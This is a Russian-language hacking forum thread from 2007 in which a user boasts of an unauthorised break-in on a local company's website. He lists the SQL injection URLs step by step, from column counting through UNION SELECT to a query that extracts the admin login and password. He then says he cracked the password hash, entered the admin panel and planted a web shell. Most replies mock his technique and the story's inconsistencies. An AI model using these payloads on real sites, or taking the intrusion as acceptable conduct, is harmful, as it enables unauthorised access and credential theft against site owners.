Новогодний взлом!

Discussion in 'Уязвимости' started by fly, 26 Dec 2007.

Thread Status:
Not open for further replies.
  1. fly

    fly Member

    Joined:
    15 Apr 2007
    Messages:
    584
    Likes Received:
    95
    Reputations:
    -10
    Короче дело было на днях. Пришел с работы и полез в сеть. Искал юизби винт (подарок другу). И попал на сайт одной известной конторы в моем любимом городе.
    Название не буду называть дабы не вызывать интереса юного скрипт-кидиса. Можно добавить, что фирма, где я работаю постоянно обращ. к ним за комплект..
    Кликнул на Продукция и попал в меню выбора продукции, но тут мое внимание удалилось в строку браузера.

    Code:
    http://comp.com/x.php?ProdID=916
    
    Ну и типично я решил проверить на скуль. Поставил заветную кавычку и получил скуль, правда без каких либо ошибок.

    Далее

    Code:
    http://comp.com/x.php?ProdID=916+order+by+1,2,3,4,5/*
    
    Затем возник проблемс , который был решен

    Code:
    http://comp.com/x.php?ProdID=-916+union+select+1,2,3,4,5/*
    
    Ничего что надо не вывело, ну сразу нашел выход

    Code:
    http://comp.com/x.php?ProdID=916+and+1=0+union+select+1,2,3,4,5,6/*
    
    Версия мускула была 4 . Осталось подобрать таблиц и вывести заветный пасс админа, т.к . админка уже была найдена.
    Хочу добавить, что данный скрипт был написан очень якобы крутой и дорогой конторой за неплохие деньги как потом выяснилось!!!!))))))))))))))

    Но при подборе вышел небольшой обломс. Я решил забить, решил стукнуть за помощью на ачат, но прошелся лесов, кста привет и спасибо Termin@L за поддержку.

    Сутки прошли, но результатов 0% даже после прогона по словарю предпол. таблиц.

    Дальше самое интересно!! Решил зайти в админку, ввел типично admin:admin прошелся в тундру, но решил проверить html код страницы :

    Code:
      <td class=TableRow1 align=right><input type="text" class=txt name="AdminName" value=""></td>
     </tr>
     <tr>
      <td class=TableRow1>Пароль:</td>
      <td class=TableRow1 align=right><input type="password" class=txt name="AdminPWD"></td>
     </tr>
     <tr>
    
      <td class=TableRow1 colspan="2" align=right><hr size=1><input type="submit" class=but value="Войти"></td>
    

    И что остается только хлопать ушами от радости
    AdminPWD--- таблица с паролем админа, ну и аналогично AdminName-- его логин.

    Запрос выглядел след. образом:

    Code:
    http://comp.com/x.php?ProdID=916+and+1=0+union+select+1,name,3,password,5,6+from+AdminPWD+limit+0,1/*
    
    ПОлучил des пароль. После подбора успешно залогонился в админку , были траблы с заливом шелла , но затем вопрос был решен.


    Поздравляю все С НОВЫМ ГОДОМ. Мемберы ачата здоровья вам , меньше мазалей на заднице и успешных тем!!!!!
     
    9 people like this.
  2. delay(0)

    delay(0) Member

    Joined:
    22 Nov 2006
    Messages:
    90
    Likes Received:
    41
    Reputations:
    6
    А что прости, тут необычного?
     
    1 person likes this.
  3. fly

    fly Member

    Joined:
    15 Apr 2007
    Messages:
    584
    Likes Received:
    95
    Reputations:
    -10
    Не обычное не стал описывать ибо уже УКА!!!!_)
     
    1 person likes this.
  4. Grey

    Grey Banned

    Joined:
    10 Jun 2006
    Messages:
    1,047
    Likes Received:
    1,315
    Reputations:
    1,159
    Типичная sql инъекция, для этого сущствует специальная тема. А вот что касается этого, то это меня вообще убило, делаем то сами не зная что:

    "Замечательно."
     
    #4 Grey, 27 Dec 2007
    Last edited: 27 Dec 2007
  5. fly

    fly Member

    Joined:
    15 Apr 2007
    Messages:
    584
    Likes Received:
    95
    Reputations:
    -10
    и чем это тебя убило?
     
  6. Scipio

    Scipio Well-Known Member

    Joined:
    2 Nov 2006
    Messages:
    733
    Likes Received:
    544
    Reputations:
    190
    fly, а ты вобще понимаешь назначение такой вот конструкции, проще http://comp.com/x.php?ProdID=916+order+by+5/*

    и вобще я всегда говорил, что получать кол-во столбцов лучше с реально существующим параметром, т.е. не -916, а 916

    улыбнуло
     
    #6 Scipio, 27 Dec 2007
    Last edited: 27 Dec 2007
  7. fly

    fly Member

    Joined:
    15 Apr 2007
    Messages:
    584
    Likes Received:
    95
    Reputations:
    -10
    Умняги хватит флейм разводить.)))
     
  8. fly

    fly Member

    Joined:
    15 Apr 2007
    Messages:
    584
    Likes Received:
    95
    Reputations:
    -10
    Code:
    Типичная sql инъекция, для этого сущствует специальная тема. А вот что касается этого, то это меня вообще убило, делаем то сами не зная что:
    Типично опеч.

    Code:
    http://comp.com/x.php?ProdID=916+order+by+5/*
     
  9. Grey

    Grey Banned

    Joined:
    10 Jun 2006
    Messages:
    1,047
    Likes Received:
    1,315
    Reputations:
    1,159
    1) Что меня убило, ну к примеру то что ты до сих пор не понимаешь конструкцию order by зачем делать сортировку сначала по первому потом по второму потом по третьему и т.д. столбцу? какой смысл?

    Если бы ты юзал нормально order+by+n - отсортировать по n-ому столбцу то хоть времени бы меньше затратил. Но чувствуется раз ты не понимаешь этого, то не разбираешся в синтаксисе sql и следовательно вся твоя работа тупая подстановка "чего то там" в параметры на подобие id и т.д печально.

    2) Что в этой теме такого что она должна быть отдельной?
     
    #9 Grey, 27 Dec 2007
    Last edited: 27 Dec 2007
  10. OptimaPrime

    OptimaPrime Banned

    Joined:
    30 Mar 2007
    Messages:
    307
    Likes Received:
    588
    Reputations:
    -61
    флай не тупи,тебе же сказали в чем ты ошибся
     
    2 people like this.
  11. Spyder

    Spyder Elder - Старейшина

    Joined:
    9 Oct 2006
    Messages:
    1,388
    Likes Received:
    1,209
    Reputations:
    475
    90% постящих скули в теме скл инжекшн не понимают почему это работает. так что ничего удивительного в этих ошибках я не вижу
     
    2 people like this.
  12. fly

    fly Member

    Joined:
    15 Apr 2007
    Messages:
    584
    Likes Received:
    95
    Reputations:
    -10
    Я не понимаю гении к чему вы видите, что я нихера не шарб?
     
    2 people like this.
  13. +toxa+

    +toxa+ Smack! SMACK!!!

    Joined:
    16 Jan 2005
    Messages:
    1,674
    Likes Received:
    1,029
    Reputations:
    1,228
    именно)

    [size=-100]ЗЫ поздравляю с первым (?) удачным хэком[/size]
     
    _________________________
  14. -=lebed=-

    -=lebed=- хэшкрякер

    Joined:
    21 Jun 2006
    Messages:
    3,804
    Likes Received:
    1,960
    Reputations:
    594
    Напомнило :
     
    1 person likes this.
  15. Macro

    Macro Elder - Старейшина

    Joined:
    11 Nov 2006
    Messages:
    552
    Likes Received:
    298
    Reputations:
    207
    Да, там еще число столбцов в одном примере - 5, а в другом - 6
     
  16. fly

    fly Member

    Joined:
    15 Apr 2007
    Messages:
    584
    Likes Received:
    95
    Reputations:
    -10
    Флейм глупый.!!! Критику я люблю она делает умнее, того кого критикуют!!!
     
  17. ~EviL~

    ~EviL~ Elder - Старейшина

    Joined:
    14 Aug 2007
    Messages:
    169
    Likes Received:
    77
    Reputations:
    4
    Да ладно вам, зачем наезжать на fly-a? Человек просто радуется успешной SQL атаке и решил поделиться с вами... =\
     
  18. +toxa+

    +toxa+ Smack! SMACK!!!

    Joined:
    16 Jan 2005
    Messages:
    1,674
    Likes Received:
    1,029
    Reputations:
    1,228
    а что можно критиковать в абсолютной банальности? поминаю там была бы новая техника, новые методы или ещё чё-нить такое, а тут что? обыкновенная sql инхэкция. остаётся тока указать на неполное понимание темы автором (в частности про order) и несостыковки в "повести"
     
    _________________________
  19. Dr.Z3r0

    Dr.Z3r0 Leaders of the World

    Joined:
    6 Jul 2007
    Messages:
    284
    Likes Received:
    595
    Reputations:
    567
    fly, понимаешь всем здесь присутствующим надоели подобного рода статьи потому что их на просторах инета в том числе и всем читаемом ][ целая куча, да и самих наверное таких историй вагон и маленькая тележка. В своем посте ты ничего нового или необычного не описал, допустил кучу ошибок... Понимаешь если люди пишут, что то подобное то пишут, что то интересное, необычное, если нет то надо было тему назвать "Мой взлом" и сунуть в Болталку... Это мое маленькое имхо...
     
Thread Status:
Not open for further replies.